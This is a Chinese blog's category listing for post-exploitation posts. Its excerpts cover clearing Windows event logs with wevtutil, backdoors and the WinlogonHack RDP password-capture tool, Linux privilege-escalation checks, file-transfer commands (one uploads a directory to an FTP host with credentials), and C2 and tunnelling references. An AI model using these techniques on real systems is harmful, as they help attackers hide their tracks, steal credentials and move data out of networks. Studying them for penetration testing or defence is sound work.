文章分类 -  安全 / 后渗透

windows日志痕迹清除
摘要:##Windows日志清除 获取日志分类列表: wevtutil el >1.txt 获取单个日志类别的统计信息:eg. wevtutil gli "windows powershell 回显: creationTime: 2016-11-28T06:01:37.986Z lastAccessTim 阅读全文
posted @ 2021-08-05 09:11 Nones 阅读(470) 评论(0) 推荐(0)
权限维持
摘要:#系统后门 ##Windows ###1、密码记录工具 WinlogonHack WinlogonHack 是一款用来劫取远程3389登录密码的工具,在 WinlogonHack 之前有 一个 Gina 木马主要用来截取 Windows 2000下的密码,WinlogonHack 主要用于截 取 W 阅读全文
posted @ 2021-08-04 12:37 Nones 阅读(213) 评论(0) 推荐(0)
liunx 提权
摘要:##Linux 内核溢出提权 linux-kernel-exploits 计划任务 crontab -l ls -alh /var/spool/cron ls -al /etc/ | grep cron ls -al /etc/cron* cat /etc/cron* cat /etc/at.all 阅读全文
posted @ 2021-08-04 12:35 Nones 阅读(64) 评论(0) 推荐(0)
内网文件的传输和下载
摘要:##内网文件的传输和下载 #wput wput dir_name ftp://linuxpig:123456@host.com/ #wget wget http://site.com/1.rar -O 1.rar #ariac2(需安装) aria2c -o owncloud.zip https:/ 阅读全文
posted @ 2021-08-04 12:34 Nones 阅读(602) 评论(0) 推荐(0)
命令和控制
摘要:Command and Control ICMP :https://pentestlab.blog/2017/07/28/command-and-control-icmp/ DNS :https://pentestlab.blog/2017/09/06/command-and-control-dns 阅读全文
posted @ 2021-08-04 12:33 Nones 阅读(104) 评论(0) 推荐(0)
内网proxy
摘要:###代理 VPN shadow sockts :https://github.com/shadow`` socks HTTP :http://cn-proxy.com/ Tor 内网跨边界应用 内网跨边界转发 NC端口转发 LCX端口转发 nps 代理脚本 Tunna Reduh ... 内网跨边 阅读全文
posted @ 2021-08-04 12:31 Nones 阅读(212) 评论(0) 推荐(0)